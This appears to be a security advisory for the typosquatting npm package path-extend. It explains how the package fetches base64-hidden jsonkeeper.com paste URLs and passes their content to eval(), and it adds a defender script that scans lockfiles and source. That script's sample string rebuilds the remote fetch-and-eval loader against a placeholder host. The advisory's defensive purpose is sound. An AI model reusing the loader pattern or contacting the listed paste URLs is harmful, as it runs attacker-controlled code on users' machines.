Malicious package: path-extend (npm)

Malicious code in path-extend (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-2929
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall path-extend

What this malware does

On require(), path.js runs an IIFE that calls a loader which fetches a base64-hidden URL (https://www.jsonkeeper.com/b/XTTBX) from jsonkeeper.com — an anonymous, mutable JSON paste host — and passes the returned data.content to eval(). A second loader fetches https://www.jsonkeeper.com/b/P0CND for the same purpose. The variable names (randomStringRe, tokenStringRe) and the base64-encoded URLs are obfuscation intended to evade scanning. The package name typosquats Node's built-in path module; package.json lists an empty author field and a generic 'Node.js path module' description, while path.js is otherwise a verbatim copy of Node core's path.js with the malicious fetch+eval block injected. Any project that require()s this package runs attacker-controlled JavaScript in its Node process, with content the attacker can change at any time by editing the paste.
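As an added defender-side example (not code from this advisory or from O3 Security), the Node script below checks a lockfile for the flagged path-extend versions and flags source that hides an http(s) URL in a base64 literal next to fetch() and eval(), the loader pattern described above. The paste URL, the lockfile contents and the function names are constructed stand-ins, not real artifacts.

```javascript
// Added example: defender-side checks for this advisory, not the advisory's own code.
// 1) Find flagged path-extend versions in a package-lock.json (lockfileVersion 2/3 "packages" map).
// 2) Flag JS source that hides an http(s) URL in a base64 literal beside fetch() and eval().
const FLAGGED = new Set(["1.0.6", "1.0.10", "1.0.11", "1.0.12", "1.0.13"]); // versions from the advisory

function findFlagged(lock, name = "path-extend") {
  const hits = [];
  for (const [p, meta] of Object.entries(lock.packages || {})) {
    // Keys look like "node_modules/a/node_modules/path-extend"; match the leaf name exactly.
    if (p.endsWith("node_modules/" + name) && FLAGGED.has(meta.version)) {
      hits.push({ path: p, version: meta.version });
    }
  }
  return hits;
}

// Quoted base64 runs of 16+ chars; decode each and keep those that are a bare http(s) URL.
const B64_LITERAL = /['"`]([A-Za-z0-9+/]{16,}={0,2})['"`]/g;
function hiddenUrls(source) {
  const urls = [];
  for (const m of source.matchAll(B64_LITERAL)) {
    const decoded = Buffer.from(m[1], "base64").toString("utf8");
    if (/^https?:\/\/\S+$/.test(decoded)) urls.push(decoded);
  }
  return urls;
}

// A hidden URL plus fetch() and eval() in one file is the loader pattern the advisory describes.
function scan(source) {
  const urls = hiddenUrls(source);
  const remoteEval = urls.length > 0 && /\bfetch\s*\(/.test(source) && /\beval\s*\(/.test(source);
  return { urls, remoteEval };
}

// Constructed samples: a stand-in paste URL and a minimal lockfile, not real artifacts.
const SAMPLE_URL = "https://paste.example/b/PLACEHOLDER";
const SAMPLE_SOURCE = `(function () {
  const randomStringRe = "${Buffer.from(SAMPLE_URL).toString("base64")}";
  fetch(Buffer.from(randomStringRe, "base64").toString())
    .then((r) => r.json()).then((d) => eval(d.content));
})();`;
const SAMPLE_LOCK = { lockfileVersion: 3, packages: {
  "": { name: "app", version: "1.0.0" },
  "node_modules/path-extend": { version: "1.0.11" },
  "node_modules/left-pad": { version: "1.3.0" } } };

console.log(findFlagged(SAMPLE_LOCK), scan(SAMPLE_SOURCE));
```

The base64 check is a heuristic: it catches the specific trick this package uses (a quoted base64 literal that decodes to a URL) and will not catch other encodings, so treat a hit as a reason to read the file, not as the only signal.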

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

The OpenSSF Package Analysis project identified 'path-extend' @ 1.0.11 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.

  • The package executes one or more commands associated with malicious behavior.

Malicious versions

5 flagged: 1.0.6, 1.0.10, 1.0.11, 1.0.12, 1.0.13

Indicators of compromise (SHA-256)

Frequently asked questions

Is path-extend (npm) safe to use?

No. path-extend on npm has been identified as a malicious package (versions 1.0.6, 1.0.10, 1.0.11, 1.0.12, 1.0.13 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

Related advisories: IN-MAL-2026-004698, IN-MAL-2026-004697, IN-MAL-2026-004713, IN-MAL-2026-004714, IN-MAL-2026-004937, IN-MAL-2026-004941, IN-MAL-2026-004940, IN-MAL-2026-004936, GHSA-qvmc-2hcj-8h4f

Credits

  • Amazon Inspector · finder
  • OpenSSF: Package Analysis · finder

path-extend (npm) malicious package — MAL-2026-2929 | O3 Security